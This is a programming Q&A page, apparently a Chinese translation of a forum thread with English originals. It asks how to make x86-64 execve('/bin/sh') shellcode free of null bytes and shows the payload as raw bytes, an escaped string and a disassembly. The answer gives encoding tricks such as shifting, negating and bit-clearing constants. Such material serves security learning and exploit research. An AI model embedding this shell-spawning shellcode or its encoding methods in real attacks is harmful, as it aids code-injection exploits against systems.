英文:
Writing ```movabs``` instruction as NULL-free shellcode
问题
我看过一些用“xor”和“inc”指令重写“mov”指令以生成无空字节的shellcode的方法,但我在将这些方法扩展到“movabs”指令时遇到了困难。
如何将以下代码重写为无空字节的shellcode?:
```python
Raw Bytes:
31F648BB2F62696E2F7368005653545F6A3B5831D20F05
Python Escaped:
"\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x73\x68\x00\x56\x53\x54\x5F\x6A\x3B\x58\x31\xD2\x0F\x05"
反汇编:
0: 31 f6 xor esi,esi
2: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f6e69622f
9: 73 68 00
c: 56 push rsi
d: 53 push rbx
e: 54 push rsp
f: 5f pop rdi
10: 6a 3b push 0x3b
<details>
<summary>英文:</summary>
I've seen ways of rewriting '''mov''' instructions using '''xor''' and '''inc''' to produce NULL-free shellcode but I have had trouble extending those methods to the '''movabs''' instruction.
How can I rewrite the following as NULL-free shellcode?:
Raw Bytes:
31F648BB2F62696E2F7368005653545F6A3B5831D20F05
Python Escaped:
"\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x73\x68\x00\x56\x53\x54\x5F\x6A\x3B\x58\x31\xD2\x0F\x05"
Disassembly:
0: 31 f6 xor esi,esi
2: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f6e69622f
9: 73 68 00
c: 56 push rsi
d: 53 push rbx
e: 54 push rsp
f: 5f pop rdi
10: 6a 3b push 0x3b
If you can say anything about the general process for thinking about rewriting shellcode as NULL-free (for arbitrary instructions), I would also be grateful.
</details>
# 答案1
**得分**: 1
您的问题在于文字常量包含了一个上字节为0的字符。幸运的是,这很容易修复:将文字常量进行移位。只需在下字节中填写任何垃圾数据,然后执行 `shr rax, 8` 以修复它,这将丢弃下字节并在上方插入一个零。
至于一般过程,有一些方法在功能上始终有效(例如,写入0x40字节而不是0x00,然后使用 `btc rax, <位位置>` 来清除您设置的多余位),但通常是找到最简单的表达常数的方式。例如,您还可以将常数的 _负数_ 写入 `rax`,然后使用 `neg rax`(或 `not rax`)来撤消取反操作,因为取反的常数不包含任何0x00字节。
<details>
<summary>英文:</summary>
Your issue is that the literal contains a 0 in the upper byte. Fortunately, that's easy to remedy: shift the literal. Just write any garbage you want in the _lower_ byte, and then do `shr rax, 8` to fix it up, which will discard the lower byte and insert a zero above.
As for the general process, there's a few methods that will functionally _always_ work (e.g., writing a 0x40 byte instead of a 0x00 and then using `btc rax, <bit position>` to clear the excess bit you set), but it's often a matter of finding the simplest way you can express the constant. For instance, you could have also written the constant _negated_ to `rax` and then used `neg rax` (or `not rax`) to undo the negation, because the negated constant doesn't have any 0x00 bytes.
</details>
通过集体智慧和协作来改善编程学习和解决问题的方式。致力于成为全球开发者共同参与的知识库,让每个人都能够通过互相帮助和分享经验来进步。
评论